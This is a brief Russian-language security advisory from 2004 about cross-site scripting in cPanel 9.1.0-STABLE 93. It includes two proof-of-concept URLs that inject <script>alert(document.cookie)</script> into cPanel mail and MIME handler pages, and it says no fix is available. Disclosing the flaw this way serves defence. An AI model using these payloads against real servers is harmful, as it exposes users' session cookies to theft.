Security Lab

Межсайтовый скриптинг в cPanel 9.1.0-STABLE 93

Дата публикации:26.03.2004
Всего просмотров:1401
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: cPanel 9.1.0-STABLE 93

Описание: Несколько уязвимостей обнаружено в cPanel. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://[target]:2082/frontend/x/mail/dodelautores.html?email=<script>alert(document.c ookie)</script>
http://[target]:2082/frontend/x/mime/addhandle.html?ext=phpz&handle=<script>alert(document.cookie</script>

URL производителя: http://www.cpanel.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: More Cpanel Vuls (cross site scripting)